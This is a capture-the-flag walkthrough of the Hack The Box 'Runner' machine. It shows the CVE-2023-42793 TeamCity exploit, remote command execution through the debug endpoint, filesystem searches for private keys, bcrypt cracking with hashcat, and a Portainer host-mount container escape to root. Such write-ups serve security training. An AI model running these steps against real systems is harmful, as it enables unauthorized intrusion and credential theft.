Enumeration
Scope
Ip Address 10.10.11.13
Nmap Scan
Copy ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -F $ip -Pn
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -p22,80,8000 -sCV $ip
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Runner - CI/CD Specialists
8000/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Copy * Open ports: 22 -80 - 8000
* UDP Open ports: None
* Services: ssh - http - http-alt CVE-2023-42793:
Copy ┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE1]
└─$ python3 CVE-2023-42793.py -u http://teamcity.runner.htb
[+] http://teamcity.runner.htb/login.html [H454NSec7607:@H454NSec] Initial Access
To get RCE, I had to generate a token from the webapp to be able to use it in the exploit.
Token
Copy eyJ0eXAiOiAiVENWMiJ9.QVBTbmdKY1RkUHRyU1dxN0d6ekgySnVsQi1n.NWU4MDVlOGEtYzViOC00NDdkLWE5ZDktZDNhYjQyNjQxMGI0 Get RCE
Copy ┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE-2023-42793]
└─$ curl -X POST 'http://teamcity.runner.htb/app/rest/debug/processes?exePath=id' -H "Authorization: Bearer $(cat token.txt)" -H "Content-Type: text/plain"
StdOut:uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser) I tried to search for files containing passwords, sensitive info or private keys and found one.
Copy
tcuser@647a82f29ca0:/$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa:1:-----BEGIN OPENSSH PRIVATE KEY----- /data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa
Copy -----BEGIN OPENSSH PRIVATE KEY-----
..snip..
xxxxxxxxxxxxxxxxxxxxxxxxBG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAlk2rRhm7T2dg2z3+Y6ioSOVszvNlA4wRS4ty8qrGMSCpnZyEISPl
htHGpTu0oGI11FTun7HzQj7Ore7YMC+SsMIlS78MGU2ogb0Tp2bOY5RN1/X9MiK/SE4liT
njhPU1FqBIexmXKlgS/jv57WUtc5CsgTUGYkpaX6cT2geiNqHLnB5QD+ZKJWBflF6P9rTt
zkEdcWYKtDp0Phcu1FUVeQJOpb13w/L0GGiya2RkZgrIwXR6l3YCX+mBRFfhRFHLmd/lgy
/R2GQpBWUDB9rUS+mtHpm4c3786g11IPZo+74I7BhOn1Iz2E5KO0tW2jefylY2MrYgOjjq
5fj0Fz3eoj4hxtZyuf0GR8Cq1AkowJyDP02XzIvVZKCMDgVNAMH5B7COTX8CjUzc0vuKV5
iLSi+vRx6vYQpQv4wlh1H4hUlgaVSimoAqizJPUqyAi9oUhHXGY71x5gCUXeULZJMcDYKB
..snip..
-----END OPENSSH PRIVATE KEY----- I'll Try to login to ssh with the one of the existing users and the private key
Success :)
Copy john@runner:~$ cat user.txt
5b86f3875c0f223145xxxxxxxxxxxxxxxxxx User flag: 5b86f3875c0f223145xxxxxxxxxxxxxxxxxx
Privilege Escalation
Copy john@runner:~$ netstat -atnp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5005 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9443 0.0.0.0:* LISTEN -
tcp 0 0 10.10.11.13:80 10.10.16.31:55852 ESTABLISHED -
tcp 0 0 127.0.0.1:8111 127.0.0.1:39674 TIME_WAIT - I'll try to map internal ports with ssh local port forwarding
Copy ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ ssh -L 5005:localhost:5005 -L 9000:localhost:9000 -L 8111:localhost:8111 -L 9443:localhost:9443 john@$ip -i id_rsa We got a web app
Copy ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ curl -I http://localhost:9000
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Length: 19130
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 07 Dec 2023 08:15:07 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Date: Thu, 04 Jul 2024 06:29:29 GMT http://localhost:9000
I knew I missed something so I returned to web app and found that I forgot to make a backup files and see what its content.
Copy tcuser@647a82f29ca0:/data/teamcity_server/datadir/backup/database_dump$ cat users
ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, john@runner.htb, 1720069876567, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, h454nsec7607, $2a$07$wpUET1qA8huRcRVWVeYXZ./XT43MJ0izESmdjKCZHawdKaSrp8oDq, , "", 1720071358142, BCRYPT
Copy matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em
Copy ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashid -m '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxx/JQsdGLulmeVo.Em'
Analyzing '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em'
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x
[+] bcrypt [Hashcat Mode: 3200]
s
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6Kxxxxx/JQsdGLulmeVo.Em:pixxxx23
Session..........: hashcat
Status...........: Cracked Login in http://localhost:9000 with these credentials
This article is very useful to understand the setup of container but was based on older verions of portainer:
Following the post:
Get the image id
Try to map host file system to the container with the following settings
Copy device: /
o: bind
type: none Create a container with the settings below
Finally, Access the console and get root access :)
Root flag: e5072defc9d08b4320325b1e16a6b83f
